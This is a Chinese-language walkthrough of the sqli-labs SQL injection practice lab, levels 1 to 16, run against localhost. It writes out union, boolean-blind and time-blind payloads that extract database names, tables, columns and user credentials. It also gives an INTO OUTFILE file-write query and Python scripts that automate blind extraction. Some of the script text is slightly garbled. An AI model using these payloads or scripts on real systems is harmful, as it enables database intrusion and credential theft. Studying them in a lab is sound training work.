Lass1
查询id为1的用户名和密码
data:image/s3,"s3://crabby-images/08587/0858753db2bf9a859997b6184f1af99df4cfd09f" alt=""
查询id为2的用户名和密码
data:image/s3,"s3://crabby-images/30c80/30c804c30ca7076cd2fe72974a13cdc12d03704a" alt=""
没有回显,不含id=-1的行
data:image/s3,"s3://crabby-images/f89d2/f89d2c050907b4a6f9b006f4e4fbcfcd9c10ac73" alt=""
判断字段数,字段数为3
data:image/s3,"s3://crabby-images/849b2/849b24e0ba3fe4cb93e0bd7f5a00fc508d9602fe" alt=""
data:image/s3,"s3://crabby-images/455ce/455ce7df6285be9db9805546ecc0418ba7353f0c" alt=""
查询数据库用户名,和数据库名
查询时id必须超出数据库以外,一般用-1
用户名:user()
数据库名:database()cha
mysql版本:version()
data:image/s3,"s3://crabby-images/ac965/ac9655c0da5d74c614e2c7f355c95651b4a06a85" alt=""
data:image/s3,"s3://crabby-images/b3e54/b3e543e803fe7c08d859eed14c92f697e8b7d095" alt=""
查询数据库中的所有表的名字:http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'security'--+
查询数据库中所有表名语法:group_concat(table_name)
从information_schema.tables中查询
条件数据库名必须为security:table_schema = 'security'
data:image/s3,"s3://crabby-images/6f541/6f54182045a71fed8c44fd86f615d5bc497edd7a" alt=""
查询users表中的字段名:http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name = 'users'--+
查询所有字段名:group_concat(column_name)
从information_schema.columns中查询
表名必须为users: table_name = 'users'
data:image/s3,"s3://crabby-images/bffe5/bffe560c1bc1bb9a3f0040ec3b9639c5ce8faffc" alt=""
查询字段值:http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat(username,0x3a,password),3 from users--+
查询所有用户名和密码:group_concat(username,0x3a,password)
从users表中
Lass2
行数为3
data:image/s3,"s3://crabby-images/890f7/890f7e22170e9e4211993211277d5039eac12e53" alt=""
data:image/s3,"s3://crabby-images/54dde/54dde0b08f5dd6cab7e2b637b2362cce2a63310f" alt=""
查询数据库名
data:image/s3,"s3://crabby-images/ad6a5/ad6a515fda8d4cad29757beb4b94d9713d4c14e8" alt=""
查询表名
data:image/s3,"s3://crabby-images/823ab/823ab47e7e42d1986ede7e2582d7d48897ab5872" alt=""
查询列名
data:image/s3,"s3://crabby-images/1f343/1f3437b751f77b3d02ab7ab30eee3d08f2d444d1" alt=""
查询字段名
Lass-3
先闭合
data:image/s3,"s3://crabby-images/3552c/3552c3b92ba69c9a5feca6a8c85909f4e69f433a" alt=""
列数为3
data:image/s3,"s3://crabby-images/3b24f/3b24f4ad19db8bf63c5770cef7dadb2636655adb" alt=""
data:image/s3,"s3://crabby-images/55ee6/55ee641febe303053b9784014ab681504145234a" alt=""
数据库名
data:image/s3,"s3://crabby-images/67526/6752644e7407ef5d29a9ea93035efd27c62b8e69" alt=""
表名
data:image/s3,"s3://crabby-images/f654b/f654bbb329dfe33bc27a87f9855cc361d71048c9" alt=""
列名
data:image/s3,"s3://crabby-images/c801a/c801a84fc80d0ffbb81a7397944740bd6ffe1340" alt=""
字段值
Lass4
闭合
data:image/s3,"s3://crabby-images/1a929/1a9292c08062fad9b1a01c0bb540d54ac9bea06c" alt=""
Lass5
data:image/s3,"s3://crabby-images/13995/13995fa0126ce35ca6c3e412bc7155f16cdc2a54" alt=""
Lass6
data:image/s3,"s3://crabby-images/2ffb2/2ffb20513ca6060d5808d96be2643302132d1fba" alt=""
页面不显示数据只有对错页面显示,选择布尔盲注
布尔盲注主要用到length(),ascii() ,substr()这三个函数,首先通过length()函数确定长度再通过另外两个确定具体字符是什么。
?id=1'and length((select database()))>9--+
#大于号可以换成小于号或者等于号,主要是判断数据库的长度。lenfth()是获取当前数据库名的长度。如果数据库是haha那么length()就是4
?id=1'and ascii(substr((select database()),1,1))=115--+
#substr("78909",1,1)=7
substr(a,b,c)
a是要截取的字符串,b是截取的位置,c是截取的长度。布尔盲注我们都是长度为1因为我们要一个个判断字符。
ascii()是将截取的字符转换成对应的ascii吗,这样我们可以很好确定数字根据数字找到对应的字符。
?id=1'and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13--+
判断所有表名字符长度。
?id=1'and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99--+
逐一判断表名
?id=1'and length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20--+
判断所有字段名的长度
?id=1'and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99--+
逐一判断字段名。
?id=1' and length((select group_concat(username,password) from users))>109--+
判断字段内容长度
?id=1' and ascii(substr((select group_concat(username,password) from users),1,1))>50--+
逐一检测内容。
Lass7
闭合
data:image/s3,"s3://crabby-images/05ab7/05ab773fd75261ed6f78e8bb9c3e21700b89bcbb" alt=""
列数为3
data:image/s3,"s3://crabby-images/b1d87/b1d8706777f70d82776d6cac5ef8583e1583b845" alt=""
data:image/s3,"s3://crabby-images/78947/789479c07b9ede3b8abf649b9b0fe69a80b70771" alt=""
页面只显示对错无数据回显
读写文件
读文件前提:
1.存在注入点的web站点用户权限要足够高
2.secure_file_priv不为NULL(show global variables like "secure_file_priv";)(否则就没办法使用mysql中的函数进行读写)
读文件函数:
select load_file('路径');
写文件前提:
general_log = on
(查看general_log:show variables like'%general%';
修改general_log为on:set global general_log = on;)
写文件
select 字段名 from 表 into outfile "路径"
http://10.0.2.15/sqli/Less-7/?id=1')) union select 1,2,group_concat(username,0x3a,password) from users into outfile "/root/桌面/sqlilabs_qiu/Mysql注入读写文件Less7/out.txt"--+
Lass8
页面只显示对错无数据回显,基于布尔值的盲注
data:image/s3,"s3://crabby-images/68312/683129cdacc7db83ad79d13b3f543887bf97ff95" alt=""
data:image/s3,"s3://crabby-images/7c717/7c717fda49d2d9cfb2ec95be63d813e3e933edc2" alt=""
#coding:utf-8
import requests
char = "abcdefghijklmnopqrstuvwxyz0123456789~*/\{}?!:@_-,"
namelen = 1024
name = ""
res = requests.get("http://localhost/sqli-labs-master/Less-8/?id=1")
truelen = len(res.content)
for i in range(1, namelen):
flag = True
for str in char:
#表名
#res = requests.get("http://localhost/sqli-labs-master/Less-8/?id=1' and mid((select group_concat(table_name) from information_schema.tables where table_schema = database()),%s,1)=%%27%s%%27 --+"%(i,str))
#字段名
#res = requests.get("http://localhost/sqli-labs-master/Less-8/?id=1' and mid((select group_concat(column_name) from information_schema.columns where table_name = 'users'),%s,1)=%%27%s%%27 --+"%(i,str))
#字段值
#res = requests.get("http://localhost/sqli-labs-master/Less-8/?id=1' and mid((select group_concat(username,0x3a,password) from users),%s,1)=%%27%s%%27 --+"%(i,str))
if(len(res.content) == truelen):
name += str
print(str)
flag = False
break
if(flag):break
print(name)
data:image/s3,"s3://crabby-images/beeb9/beeb9a786b57962f80be2338a8979a95948c6e3e" alt=""
脚本比较慢
Lass9
无论对错,回显都一样。此时基于布尔盲注的方法已经不适用,故采用基于时间的盲注
布尔盲注适合页面对于错误和正确结果有不同反应。如果页面一直不变这个时候我们可以使用时
间注入,时间注入和布尔盲注两种没有多大差别只不过时间盲注多了if函数和sleep()函数。
if(a,sleep(10),1)如果a结果是真的,那么执行sleep(10)页面延迟10秒,如果a的结果是假,执行1,页面不延迟。通过页面时间来判断出id参数是单引号字符串。
?id=1' and if(1=1,sleep(5),1)--+
判断参数构造。
?id=1'and if(length((select database()))>9,sleep(5),1)--+
判断数据库名长度
?id=1'and if(ascii(substr((select database()),1,1))=115,sleep(5),1)--+
逐一判断数据库字符
?id=1'and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13,sleep(5),1)--+
判断所有表名长度
?id=1'and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99,sleep(5),1)--+
逐一判断表名
?id=1'and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20,sleep(5),1)--+
判断所有字段名的长度
?id=1'and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99,sleep(5),1)--+
逐一判断字段名。
?id=1' and if(length((select group_concat(username,password) from users))>109,sleep(5),1)--+
判断字段内容长度
?id=1' and if(ascii(substr((select group_concat(username,password) from users),1,1))>50,sleep(5),1)--+
逐一检测内容。
python脚本
import requests
import time
将url 替换成你的靶场关卡网址
修改两个对应的payload
目标网址(不带参数)
url = "http://127.0.0.1/sqli-labs-master/Less-9/"
猜解长度使用的payload
payload_len = """?id=1' and if(
(length(
(database())
) ={n})
,sleep(5),3) -- a"""
枚举字符使用的payload
payload_str = """?id=1' and if(
(ascii(
substr(
(database())
,{n},1)
) ={r})
, sleep(5), 3) -- a"""
获取长度
def getLength(url, payload):
length = 1 # 初始测试长度为1
while True:
start_time = time.time()
response = requests.get(url= url+payload_len.format(n= length))
页面响应时间 = 结束执行的时间 - 开始执行的时间
use_time = time.time() - start_time
响应时间>5秒时,表示猜解成功
if use_time > 5:
print('测试长度完成,长度为:', length,)
return length;
else:
print('正在测试长度:',length)
length += 1 # 测试长度递增
获取字符
def getStr(url, payload, length):
str = '' # 初始表名/库名为空
第一层循环,截取每一个字符
for l in range(1, length+1):
第二层循环,枚举截取字符的每一种可能性
for n in range(33, 126):
start_time = time.time()
response = requests.get(url= url+payload_str.format(n= l, r= n))
页面响应时间 = 结束执行的时间 - 开始执行的时间
use_time = time.time() - start_time
页面中出现此内容则表示成功
if use_time > 5:
str+= chr(n)
print('第', l, '个字符猜解成功:', str)
break;
return str;
开始猜解
length = getLength(url, payload_len)
getStr(url, payload_str, length)
data:image/s3,"s3://crabby-images/f3c44/f3c447c0a5209e11b03e71507a4ec45749fb7c86" alt=""
Lass10和lass9一样,'换成"
Lass11
#注释
Or 1=1判断是否有sql注入
data:image/s3,"s3://crabby-images/3716d/3716d2fbfd5cdd5fe7021003674a2a099663d0ee" alt=""
Lass12
data:image/s3,"s3://crabby-images/9bbb6/9bbb676f8f5cd62f931c53607363c13898401eaf" alt=""
Lass13和lass12差不多,只需要将双引号换成单引号。
Lass14和lass11差不多,只需要将单引号换成双引号。
Lass15和第lass11一样,只是不产生报错信息。布尔盲注。有错误页面和正确页面进行参考。
Lass16和lass12一样,需要布尔盲注。